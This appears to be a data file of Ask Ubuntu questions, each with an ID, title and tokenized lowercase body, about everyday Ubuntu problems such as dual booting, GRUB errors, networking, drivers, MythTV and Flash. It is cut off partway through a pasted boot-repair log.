247292	broken gnome-shell on mythbuntu	how do you fix a completely blank screen when using gnome-shell on mythbuntu 12.04 ? i installed mythbuntu on a vanilla dell inspiron 660s desktop connected to an hdmi monitor , and most everything seemed to work . however , after having used gnome-shell for a couple years , i hate the restricted ui of xfce . so i installed gnome-shell via the usual sudo apt-get install gnome-shell . after i rebooted , i saw the normal dell boot screen , but afterwards all i get is a completely black screen . i can still ssh into the machine and i do n't see anything weird in cat /var/log/syslog | less , but then again i 'm not sure what i 'd be looking for . in my /var/log/dmesg , i see things like : [ 8.480907 ] hdmi : detected monitor samsung at connection type hdmi and : [ 8.625670 ] type=1400 audit ( 1359080873.397:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=888 comm= '' apparmor_parser '' so it can see the monitor and the lightdm service is running . how do i get my display working again on mythbuntu and gnome-shell ?
247294	unable to connect to internet -- networking config not set up	i have a recent install of ubuntu server ( all command line ) and at the time of the install i was not connected to the internet . when entering sudo apt-get update i get a bunch of messages saying failed to fetch repos . i am unable to ping google , askubuntu , or any other site sudo lshw -class network indicates both eth0 and eth1 are disabled . ifup eth0 results in ignoring unknown interface eth0=eth0 is there a way to test the connection from cable modem to machine is ok ? ( i checked a few times and believe my cable/connections are ok , but i can check again ) thanks bp
247296	accidentally removed /etc/pam.d/common-* files	i accidentally removed /etc/pam.d/common-* files on ubuntu 12.04 through ssh . i have a backup of the files however , i am unable to use sudo nor log back in . is there a way to fix this ?
247298	dual boot a light-weight variant of ubuntu on a toshiba satellite l505	so i have windows installed on a toshiba l505 , i 'm perfectly fine with windows but my battery life is extremely low . right now , i 'm not planning on getting a new battery but i am wondering if i can use some very light weight variant of ubuntu so i can connect to the internet on-the-go and use windows at home . i would also need the distro to be uninstallable ( which i do n't know how to do ... ) last time i tried ubuntu on a toshiba , the fan went crazy and it used to crash continuously , i do n't want to risk that with this toshiba . all help is much appreciated , thanks
247302	brightness does not change on asus k55n laptop	i have tried setting different acpi_os , acpi_backlight=vendor , changed the kernel to 3.7.4 , and yet nothing happens when i use the fn + f5/f6 keys to change the brightness . kde recognizes it and will change it in the software but the lcd backlight does not respond . i have also tried the custom asus wmi drivers which did n't work as well . anything else i can try ? i 'm running kubuntu 12.10 with amd catalyst 13.1 drivers . thank you !
247303	mythtv backend setup guide ubuntu server 12.10	i have tried a handful of guides for installation , but i ca n't seem to get any of them to work . my ideal solution would be mythtv-backend running on ubuntu server connecting to the cmyth pvr plugin on xbmc . guides i 've used : http : //beckustech.wordpress.com/2012/02/27/setting-up-a-home-server-with-ubuntu-11-10-part-2-mythtv/ http : //blog.andrewmanugian.com/2009/07/26/andrewsmythtvguide/ # listings i 've started from scratch with fresh installs of ubuntu several times , and i have never been able to get the front end to connect . i 've changed the ip address setting in mythtv-setup and my.cnf . i have also run several different combinations of dpkg-reconfigure . i 've been fighting with this so long , i feel like i 'm missing something obvious . one final question - any time i try to run mythtv-setup via ssh it prompts for a password . anything i type is the wrong password - which is problematic - because i do n't have x installed on this machine . obviously , i 'm doing something wrong , but i have no idea what . tl ; dr ; how do i set up mythtv-backend on ubuntu server 12.10 for remote connections ? what 's the secret to running mythtv-setup over ssh ?
247305	installing a web browser in linux server	i have a website which is being hosted by a linux server . i can access my files of my website using ssh . i was thinking if it is possible to install a web browser into my linux server so that i can browse websites in it . i hope you understand what i 'm trying to do here . if that is possible , can you show me how to do it . your help would be greatly appreciated ! thanks !
247306	dual booting 12.04 on windows 7 , partion i made for ubuntu is not showing up on windows explorer	i made a 400 gb partition for ubuntu . why is n't the partion showing up in windows explorer ? should i be worried or is this normal ?
247313	dual booting 12.10 2 separate hdd windows 7	first let me say sorry for another one of these threads . my situation is unique or after five days of reading and trying i cant figure this out , but i am very dangerous . so if i missed it i am sorry for posting this . i am novice at linux at very best actually probably less than . what i have is i can load ubuntu just fine and i can load windows just fine , but to switch between them i have to disable ubuntu under uefi in bios . it is like grub is not mapped to the windows boot loader/mbr properly . by disabling grub it will bypass it and load windows enabling it allows me to load ubuntu . i just would like the grub loader to work as designed . i know it is operator error . i did n't do boot repair as most examples did n't fit my situation . after about 30 installs i need help . this is what i have : windows 7 machine hp sandy-bridge mother board quad core i5 2.8ghz sata with uefi 12 gig ram 2 separate hdd drives tb each windows 7 on one /dev/sda1 ubuntu 12.10 on the other /dev/sdb1 this got me pointed and started in the right direction . also when i put in iso.image it loads in efi mode http : //www.linuxbsdos.com/2012/05/17/how-to-dual-boot-ubuntu-12-04-and-windows-7/ i manually partitioned ubuntu on install and it looks like this /dev/sdb1 fat32 /boot/efi ( did efi because ext4 would n't work do to uefi i think ) /dev/sdb2 ext4 / /dev/sdb3 ext4 /home /dev/sdb4 linux-swap install worked as expected then rebooted . grub loader came up i picked ubuntu and it loaded fine . tried to reboot into windows and got ( error invalid efi file ) nothing else , but ubuntu loads fine . when the install finished it put an ubuntu header under uefi where there was nothing before . bios setup looked like this before install uefi legacy boot sources atapi-cd-rom hard drive hitachi ( windows drive ) stxxx ( ubuntu drive ) network controller bios looks like this after ubuntu 12.10 install uefi ubuntu ( if i disable this windows loads ) legacy boot sources atapi-cd-rom hard drive stxxx ( ubuntu drive ) hitachi ( windows drive ) network controller so i have moved the master and slave drive around and it does n't help . i was going to use easybcd but was scared to mess with windows hints the separate hdd . how can i get grub to load either ubuntu or windows just be selected which one i want . my family also uses this computer and do n't want them in the bios . hope this is n't to confusing i really appreciate any help just even pointed in the right direction . i have read just about everything i can find on uefi and dual boot , but most is on partitioning the windows drive and not separate drives . i have also thought about pulling the windows drive and then installing ubuntu , but know if it will still read live cd if i do this . or if that would make a difference .
247325	does microsoft office run in crossover/wine/playonlinux ?	i 'm a student so i kinda need full compatibility with microsoft office documents for school . i was wondering if office will run without major problems in crossover , wine , or playonlinux ?
247329	what documents are available for juju design and architecture ?	where do i find juju design and architecture documents ?
247330	why does booting 12.10 dump me into grub ?	i used the ubuntu windows installer to dual boot ubuntu 12.10 and my already installed windows 8 . ubuntu came up after the boot when the process was through with the installation . when i attempt to get into the ubuntu 12.10 after shutting the system down , the boot dumped me to an interactive window grub and wanted me to load a missing loader ? since i am a very light user of ubuntu i am unsure what to do now . is there a process or procedure to follow to fix this problem ?
247331	how do i remove/customize unity keyboard shortcuts ?	is there any way to remove or configure the following unity keyboard shortcuts ? i want to make use of these keyboard shortcuts , but i have no use for what they 're currently assigned to . super+m ( music search ) super+a ( application search ) super+c ( picture search ) the keyboard settings utility does not show these anywhere .
247335	kernel panic while installing ubuntu 12.04 from burnt cd	i 'm having problems installing ubuntu 12.04 lts 64-bit on my laptop . i once had it installed on my laptop with windows 7 and ubuntu 12.04 64-bit , but lightdm got weird so i was forced to erase the ubuntu partition . i erased all swap partition and ext4 partition . after that , i used minitool partition wizard to rebuild the mbr . so there was only windows 7 left . after that i tried a vm but i was very disappointed . so i tried installing ubuntu on my laptop again , but the installer did not recognize my windows partition . it just showed one hdd with no partition . just one blank 320 gb drive . i went back to windows , did some searching and i messed up my mbr . i used gdisk to wipe mbr along with hdd signature : ( so i could n't use any partition and my laptop did n't boot into any thing . so i got windows 7 install cd and ran recovery . it was fixed in 5 seconds ... .. then i tried installing ubuntu again with my cd . the kernel panic pictured here occurred : so i tried installing through wubi.exe , but after it was booted , it said it could n't find root and get root or mount root , and fix partition . so my question is : how do i successfully install ubuntu 12.04 lts 64-bit on my laptop ? i will gladly add any additional info you need .
247338	english/hungarian users	i want to install a new ubuntu desktop with english and hungarian languages . do i install english ubuntu and then get a hungarian language pack or install hungarian - if this is possible . my partner is hungarian and wants to use libre etc with hungarian user/feature prompts , but i am english and want to maintain the overall support of the programs .
247339	ibus ( anthy ) not working with skype 4.1.0.20	i got skype working with ibus ( and it took a while at the time ) , but recently both my working set-up ( on 12.04 ) broke , and any attempts for a new set-up ( on 12.10 ) failed . ( on 2 separate computers . ) that is to say , ibus does not input in the skype window any longer . ( ibus is running , and selecting the anthy input method has no effect when the cursor is in the skype window . it works fine via keyboard shortcut or the ibus menu in other applications . ) i have the lines export gtk_im_module=ibus export xmodifiers= @ im=ibus export qt_im_module=ibus export xim_program=/usr/bin/ibus-daemon in my .bashrc . and have the qt & gtk versions of ibus installed . has anything changed for skype and ibus to stop working ?
247341	mounting samba share in using fstab	i tried to mount a samba share from the local network to a folder in my pc . i added the following line in fstab sudo mount -t cifs //192.168.1.5/my/folder/ /home/mounts/localmount/ but when i do sudo mount -a , it gives the following error : - [ mntent ] : line 13 in /etc/fstab is bad can anyone tell me what i did wrong ? i 'm on ubuntu 12.10 , so sudo smbmount //hostname/sharename ~/mounts/sharename -o user=username wont work [ source ]
247345	any software to run tv tuner usb in ubuntu 12.04.. ? if anyone know about it then please suggest me	i have use intex tv tuner usb . i want software to use it on ubuntu 12.04 .can anyone know about it ? please suggest me .
247348	stop cron from mailing the user	i am facing an issue with ubuntu server . i am running a php script using a cron job which executes every 5 minutes . this folder spool/mqueue is showing 112gb space . the scripts job is to fetch data from mysql . if there is no data it will show an error . now there is an error and cron is trying the send the mail to the users where user email is not defined and it is creating log file in mqueue folder . how to customize cron so that it would not send mails and write logs ?
247351	linux batch file similar to windows batch file ( for backing up a database )	i have here the batch file in windows , i want to apply the same to linux . may i ask your help to run it in linux . below is the batch file for windows : @ echo off title upload masterlist set /p answer=do you want continue ? [ y/n ] : if % answer % ==y goto g if % answer % ==y goto g if % answer % ==n goto endof if % answer % ==n goto endof : endof goto : eof : g cls set mysql_home=mysql > c : \xampp\mysql\bin\mysql.exe set database_name=ppn set user_name=root set password= set sql_file=c : \legal_backup\masterlist.sql % mysql_home % -u % user_name % -p % password % -d % database_name % < % sql_file % echo . echo . uploading masterlist is successfully done ... ... ... ... .. ! echo. & pause & goto : eof thanks in advance , jet
247355	right click on macbook 7.1 ( ubuntu 12.10 ) ?	there 's two things i love : ubuntu and my macbook . unfortunately the right click ( = click with two fingers ) is just a real pain . is there a way to have my right click in the right bottom corner of my trackpad ? i use ubuntu 12.10 .
247356	using wubi to install ubuntu studio with pre downloaded image	i am running windows 8 x64 enterprise , and have downloaded the ubuntu studio 12.10 x64 iso . i place wubi.exe and the iso in the same folder , and run it as administrator . but wubi still attempts to download the stock 12.10 iso . the studio iso also has a wubi.exe on it , but even that one tries to download the stock image . is there a way to get this to work ? or does wubi support only stock ubuntu ?
247358	where should i start crond ?	on my ubuntu server ( lts 12.04 ) i would like crond to be running every time i boot up . where should i configure this ? i took a look at service -- status-all and saw that cron was there , but it was marked with a question mark . in general , where should a user add daemons that they want to be executed at boot ?
247364	record stream with avconv stops prematurley	i am trying to simply record a ip camera stream to my harddrive on ubuntu linaro . it works very well for 4 seconds then stops . there are no errors and playback is perfect . it seems like it is doing it intentionally . however i can not for the life see where this file size is set . it stops after approx 280k . if i lower the stream size it just records for longer but always stops when the file is roughly 280k . if i reduce the filesize with the -fs options and can force it smaller but any value over the 280k leaves the file at 280k . here is my output : avconv -y -i 'rtsp : //192.168.0.100:554/axis-media/media.amp ? videocodec=h264 & streamprofile=quality ' -benchmark -loglevel debug -c copy test.mpg produces : avconv version 0.8-4:0.8-1ubuntu1linaro1 , copyright ( c ) 2000-2011 the libav developers built on jan 26 2012 15:06:17 with gcc 4.6.1 configuration : -- extra-version='4:0.8-1ubuntu1linaro1 ' -- arch=arm -- prefix=/usr -- libdir=/usr/lib/arm-linux-gnueabi -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-libfreetype -- extra-cflags='-marm -fpic -dpic ' -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- shlibdir=/usr/lib/arm-linux-gnueabi/neon/vfp -- extra-cflags='-mfpu=neon -fpic -dpic ' -- enable-shared -- disable-static libavutil 51 . 21 . 0 / 51 . 21 . 0 libavcodec 53 . 34 . 0 / 53 . 34 . 0 libavformat 53 . 20 . 0 / 53 . 20 . 0 libavdevice 53 . 2 . 0 / 53 . 2 . 0 libavfilter 2 . 15 . 0 / 2 . 15 . 0 libswscale 2 . 1 . 0 / 2 . 1 . 0 libpostproc 52 . 0 . 0 / 52 . 0 . 0 [ rtsp @ 0x26aa0 ] sdp : v=0 o=- 1343234035552520 1343234035552520 in ip4 192.168.0.100 s=media presentation e=none b=as:50000 t=0 0 a=control : rtsp : //192.168.0.100:554/axis-media/media.amp ? videocodec=h264 & streamprofile=quality a=range : npt=0.000000- m=video 0 rtp/avp 96 c=in ip4 0.0.0.0 b=as:50000 a=framerate:30.0 a=transform:1,0,0 ; 0,1,0 ; 0,0,1 a=control : rtsp : //192.168.0.100:554/axis-media/media.amp/trackid=1 ? videocodec=h264 & streamprofile=quality a=rtpmap:96 h264/90000 a=fmtp:96 packetization-mode=1 ; profile-level-id=420029 ; sprop-parameter-sets=z0iakekqcgdlyc3aqebpb4krua== , am48ga== [ rtsp @ 0x26aa0 ] video codec set to : h264 [ null @ 0x2a800 ] rtp packetization mode : 1 [ null @ 0x2a800 ] rtp profile idc : 42 profile iop : 0 level : 29 [ null @ 0x2a800 ] extradata set to 0x2ad80 ( size : 29 ) ! hello state=0 [ h264 @ 0x2a800 ] err { or , } _recognition separate : 1 ; 1 [ h264 @ 0x2a800 ] err { or , } _recognition combined : 1 ; 1 [ h264 @ 0x2a800 ] unsupported bit depth : 0 [ rtsp @ 0x26aa0 ] all info found [ rtsp @ 0x26aa0 ] estimating duration from bitrate , this may be inaccurate input # 0 , rtsp , from 'rtsp : //192.168.0.100:554/axis-media/media.amp ? videocodec=h264 & streamprofile=quality ' : metadata : title : media presentation duration : n/a , start : 0.039989 , bitrate : n/a stream # 0.0 , 22 , 1/90000 : video : h264 ( baseline ) , yuvj420p , 1280x800 [ par 1:1 dar 8:5 ] , 1/180000 , 90k tbr , 90k tbn , 180k tbc [ mpeg @ 0x2fac0 ] vbv buffer size not set , muxing may fail output # 0 , mpeg , to 'test.mpg ' : metadata : title : media presentation encoder : lavf53.20.0 stream # 0.0 , 0 , 1/90000 : video : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 , yuvj420p , 1280x800 [ par 1:1 dar 8:5 ] , 1/90000 , q=2-31 , 90k tbn , 90k tbc stream mapping : stream # 0:0 - > # 0:0 ( copy ) press ctrl-c to stop encoding received bye for stream 0 ( 1/1 ) = 208kb time=1.36 bitrate=1252.6kbits/s frame= 49 fps= 49 q=-1.0 lsize= 286kb time=1.88 bitrate=1245.9kbits/s video:283kb audio:0kb global headers:0kb muxing overhead 0.902341 % thank you in advance .
247381	ubuntu for phones - downloadable rom ?	will ubuntu release the os to download ? i have the galaxy nexus . i read on different pages that ubuntu will not be downloadable , just preinstalled on phones . but some sites mean that ubuntu for the galaxy nexus will be aviable to download in february . who knows the truth ? i really would love ubuntu on my gnex . thank you .
247382	restore original notification icons after deinstalling xfce	i am using ubuntu 12.04 with gnome classic environment . i wanted to try xfce , so i installed the metapackage xfce4 . in the end , i was not convinced so i removed it and came back on gnome classic . the problem is , even though i removed the xfce4 package , it seems a lot of things are still installed , and some modifications have been made . some defaut apps have been changed ( thunar replaced nautilus as default app ) , but i could change this . but how do i revert to the original notification icons instead of these ones : http : //imgur.com/bscucof ? i went in system settings > appearance , changed the theme , but the ugly icons are still used for notifications . thanks in advance ! p.s . : my question might also be : how to make sure the metapackage xfce4 has been removed totally ?
247385	uninstall steam beta on ubuntu 12	i uninstalled steam beta via sudo apt-get remove steam , but it does n't remove ~/.steam and ~/.local/steam where most of the files are . is the uninstaller corrupt ?
247386	for the backlight to work i have to type in sudo modprobe -r apple_gmux everytime	on my macbook pro the screen brightness key does n't work . for it to work i have to type in sudo modprobe -r apple_gmux sudo modprobe apple_gmux everytime i start up ubuntu . is there anyway to fix this or auto run it .
247388	how to add licensing to ubuntu application ?	i am developing a commercial app for ubuntu software center . since it is commercial , i do not want users can simply copy/download the app from somewhere else and put it into pcs without buying it first . this led me to license key webpage on ubuntu.com . as you can see , the description is way too simple . are there any tutorials or guidelines detailing the best practice in putting licenses to your software in ubuntu ?
247392	how can i synchronize windows links ( .lnk ) to 12.10 using ubuntu one ?	my problem ubuntuone does not synchronize windows link files ( .lnk ) . now , i do not expect ubuntuone to synchronize the actual links by changing an .lnk file to a linux symlink , nor do i do expect ubuntuone to copy the actual target file in the library ( as though it were a hard link ) . but i would love to have ubuntuone copy the .lnk files themselves . the use case i have an identical directory structure on my windows computer ( @ work ) and my 12.10 ( @ home ) . at work i have a folder called library which contains all my pdfs . when i am working on something i put a link to that file in the current working directory . that 's nice because all my files are easy to reach and i know which files i have referred to . that would allow me to see what files i quoted . on the long run it would allow me to use a script to convert the .lnk files to symbolic links on 12.10 . as a part of this question : do you have a ) a proposal of a batch script to convert windows .lnk files to text files and b ) a script that converts that text file to a symlink on 12.10 . i could run the first script on w $ and the second on 12.10 . or do you have a better solution ? the background i have read the following questions ( and their answers ) and i think this is not a duplicate , because i do n't want the target file ( the file the link refers to ) to be copied , but simply the .lnk file itself . does ubuntu one follow symlinks if synchronizing a folder ? does ubuntu one sync symbolic links with windows ? can i synchronize links with ubuntu one ? ( a bit similar , but closed )
247397	high cache and slow fallout 3 ( wine ) on ubuntu 64bit 12.10	my setup : sony vaio vgn-fw11e with radeon hd 3470 ( tech spec ) 3 gb ram ubuntu 12.10 64bit the problem : after a few minutes of gameplay the game is going down in speed to very slow . after quitting i see a ram usage of 1,6 gb and a cache of 1,4 gb . after a fresh restart the ram is only at 700mb and cache around 100mb . my idea is to split the memory hardcoded between cpu and gpu ( see raspberry pi project ) so the cache and the gpu are not in conflict . but it 's only a `` maybe it will help '' somebody has an idea about why this happens and how i can speed it up ? is there any slow down between the wine 32bit ( 1.5.x ) application and the 64bit os ?
247398	what software should i install for opening .stl files ?	i use ubuntu 12.10 . what software can i install that can open physible .stl files ? and what are the differences between these softwares ?
247401	improve ubuntu 12.10 performance on vm	i am using ubuntu 12.10 on a virtual machine in win7 . it is really slow and i wanted to ask what can i do to improve it . i have set 2gb ram ( from 4gb on physical machine ) and 16gb hard disk for the machine . i need to run only player/stage simulator from the ubuntu and some text editor for the source code writing . can i lighten the gui as in windows . there are a lot of animations that i do n't really need can you suggest some disabling of applications or services i would appreciate every advice .
247402	hplip or cups can not find network printers ?	i have been searching for an answer for days now , thought it was time to ask ! i have just setup my first ubuntu server , everything is working perfect . i have internet connection , i can ping every computer on our network but i can not for the life of me figure out how to add a network attached printer under cups or hplip . i have two hp printers , one attached to a computer at 192.168.1.8 and one attached to a computer at 192.168.1.24 . we have 8 windows computers on our network , every one of them can find , view and print . i can ping both of these ip addresses successfully from the ubuntu box , why can i not get these printers to work ? hplip returns : '' warning : no devices found on the 'net ' bus . if this is n't the result you are expecting , warning : check your network connections and make sure your internet warning : firewall software is disabled . '' find new printers button on cups returns : '' no printers found . '' any help would be greatly appreciated !
247406	ubuntu 12.10 wireless problem but windows can work	i am a student . my laptop has both windows7 and ubuntu 12.10 . in school , with school wifi , both os are working well . but in the hostel , with hostel wifi , ubuntu only works for about 4 to 5 min and although it appear connected , the webpage does not load . ping google appear 5-digit . i switch to windows and it works . is there any suggestion ?
247407	why has my wired internet connection become intermittent ?	i have my laptop plugged in with an ethernet cable at work . it gives me internet . two weeks ago it started becoming intermittent . at apparently random intervals i can not load any more web pages . firefox will try for a long time to load any pages , and in the end it says `` server not found . '' if i wait about five minutes , it will start working again . it is not just firefox : dropbox loses it 's connection too . the network manager gives me no errors or complaints . i have disabled wireless , thinking that my personal hotspot might be interfering with it . my colleague has a different ethernet cable plugged into her computer , and she has no such problems with her internet connection . i used her cable with my laptop , but the problem remained . i have dual boot . i tested the connection with windows 7 , and with substantial browsing the problem did n't arise . it seems likely that there 's something fishy going on with my ubuntu installation . i may test with windows again , just to make sure . i updated ubuntu today . what can i do to find the cause of this problem ? thank you so much .
247408	how can i have a dash-like search under xfce ?	about 1.5 years ago , i tried out ubuntu 11.04 . i remember the dash being a rather helpful tool and i like the equivalent features on both windows 7 ( via the start-button ) and the mac os . when i press alt + f2 , it opens the app finder but this only gives me a little window that i do not understand how to use . if i type in terminal or writer , it shows neither the command terminal or libreoffice writer . how can i get functionality similar to the dash ? an important edit , because 14.04 happened synapse still works on 14.04 ! : ) please go here and upvote this post ( click here ) .
247410	how can i install my own fonts from several subfolders ?	( system : xubuntu 12.10 with xfce ) hello , i have a folder named fonts on my windows partition which is mounted automatically on boot ( why , i do n't know , but i like it ! ) . the fonts are sorted in subfolders based on their style ( sans , serif , monospace or handwritten ) . these subfolder contains several .zip-files and their unzipped folders . so in total , these subfolders contain lots of .ttf and .otf files . can i somehow copy all those .ttf and .otf files to their respective folders truetype , type1 etc . in /usr/share/fonts with a somewhat simple action ? going through all the font-folders would be mind-numbing . : / edit i can answer my own question : sudo find . -name `` *.ttf '' -exec cp `` { } '' /usr/share/fonts/truetype/ `` ; '' and sudo find . -name `` *.otf '' -exec cp `` { } '' /usr/share/fonts/type1/ `` ; '' is what helped me .
247411	flash wo n't work with ubuntu 12.10 64 bit	i 've spent almost an entire day trying to make flash work . i first tried doing installing adobe-flashplugin . firefox detects the plugin in about : plugins , but does not show the version number [ it is left blank ] . i tried removing adobe-flashplugin and installing ubuntu-restricted-extras . but the same result . this is my output for dpkg -l \*flash\* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-===============================-====================-====================- ==================================================================== un flashplayer-mozilla < none > ( no description available ) un flashplugin < none > ( no description available ) un flashplugin-downloader < none > ( no description available ) ii flashplugin-installer 11.2.202.261ubuntu0 . amd64 adobe flash player plugin installer un flashplugin-nonfree < none > ( no description available ) un libflashsupport < none > ( no description available ) any ideas ?
247425	update manager package list or status file could not be opened	could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : read error - read ( 5 : input/output error ) , e : the package lists or status file could not be parsed or opened . '
247427	wireless does not work	i am a student . my laptop has both windows7 and ubuntu 12.10 . in school , with school wifi , both os are working well . but in the hostel , with hostel wifi , ubuntu only works for about 4 to 5 min and although it appear connected , the webpage does not load . ping google appear 5-digit . i switch to windows and it works . i know some may think that there is some problem with hostel network . yes . there is . but windows can work.. and i really want to use my ubuntu.. is there any suggestion ?
247434	error : unknown file system grub rescue	first of all let me apologise for the extension of my post . after a successful removal of windows xp on my dualboot with xubuntu 12.10 , i tried to resize and move the / , /home partitions to use the leftover unallocated space left . the problem is that i 've made some stupid mistakes . first stupid mistake i 've made was not to click on swap right click swap off so i would n't work with mounted partitions . second , and even worst stupid mistake i 've made was not to do a full backup before hand of all important data . so now i 'm stuck at a black screen with error : unknown file system grub rescue boot info script 5a35e00 + boot-repair extra info [ boot-info 22jan2013 ] ============================= boot info summary : =============================== = > grub2 ( v2.00 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 1 for ( , msdos2 ) /boot/grub . sda2 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda3 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sda4 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda2 2,048 181,475,797 181,473,750 83 linux /dev/sda3 * 181,477,376 230,219,775 48,742,400 83 linux /dev/sda4 230,219,776 234,440,703 4,220,928 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda3 0060b00f-e13f-41c0-8058-00c6eff68771 ext4 /dev/sda4 2cbcbc03-b2c8-429b-9179-673ee534ca89 swap /dev/sr0 iso9660 xubuntu 12.10 i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sda3 /media/xubuntu/0060b00f-e13f-41c0-8058-00c6eff68771 ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =============================== stderr messages : =============================== cat : write error : broken pipe file descriptor 8 ( /proc/7921/mounts ) leaked on lvscan invocation . parent pid 12839 : bash no volume groups found additional information : =================== log of boot-repair 2013-01-25__00h06 =================== boot-repair version : 3.197~ppa27~quantal boot-sav version : 3.197~ppa27~quantal glade2script version : 3.2.2~ppa45~quantal boot-sav-extra version : 3.197~ppa27~quantal boot-repair is executed in live-session ( ubuntu 12.10 , quantal , ubuntu , i686 ) cpu op-mode ( s ) : 32-bit , 64-bit file=/cdrom/preseed/xubuntu.seed boot=casper initrd=/casper/initrd.lz quiet splash -- maybe-ubiquity =================== os-prober : =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sda3 : uuid= '' 0060b00f-e13f-41c0-8058-00c6eff68771 '' type= '' ext4 '' /dev/sda4 : uuid= '' 2cbcbc03-b2c8-429b-9179-673ee534ca89 '' type= '' swap '' /dev/sr0 : label= '' xubuntu 12.10 i386 '' type= '' iso9660 '' =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : sda3 : sda , maybesepboot , no-grubenv nogrub , no-docgrub , no-update-grub , 32 , no-boot , no-os , not -- efi -- part , part-has-no-fstab , part-has-no-fstab , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , nopakmgr , nogrubinstall , no -- -usr , part-has-no-fstab , not-sep-usr , standard , farbios , /media/xubuntu/0060b00f-e13f-41c0-8058-00c6eff68771 . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , no-os , 2048 sectors * 512 bytes =================== parted -l : model : ata hitachi hts54161 ( scsi ) disk /dev/sda : 120gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 2 1049kb 92.9gb 92.9gb primary 3 92.9gb 118gb 25.0gb primary ext4 4 118gb 120gb 2161mb primary linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== parted -lm : byt ; /dev/sda:120gb : scsi:512:512 : msdos : ata hitachi hts54161 ; 2:1049kb:92.9gb:92.9gb : : : ; 3:92.9gb:118gb:25.0gb : ext4 : : ; 4:118gb:120gb:2161mb : linux-swap ( v1 ) : : ; warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/xubuntu/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=xubuntu ) /dev/sda3 on /media/xubuntu/0060b00f-e13f-41c0-8058-00c6eff68771 type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda2 sda3 sda4 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : alarm ashmem autofs binder block bsg btrfs-control bus cdrom cdrw char console core cpu cpu_dma_latency disk dri dvd dvdrw ecryptfs fb0 fd full fuse fw0 hpet input kmsg kvm log lp0 mapper mcelog mem net network_latency network_throughput null oldmem parport0 port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda2 sda3 sda4 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout uinput urandom vga_arbiter vhost-net zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.5g 189m 1.3g 13 % / udev devtmpfs 1.5g 12k 1.5g 1 % /dev tmpfs tmpfs 606m 800k 606m 1 % /run /dev/sr0 iso9660 694m 694m 0 100 % /cdrom /dev/loop0 squashfs 665m 665m 0 100 % /rofs tmpfs tmpfs 1.5g 20k 1.5g 1 % /tmp none tmpfs 5.0m 4.0k 5.0m 1 % /run/lock none tmpfs 1.5g 88k 1.5g 1 % /run/shm none tmpfs 100m 16k 100m 1 % /run/user /dev/sda3 ext4 23g 694m 22g 4 % /media/xubuntu/0060b00f-e13f-41c0-8058-00c6eff68771 =================== fdisk -l : disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 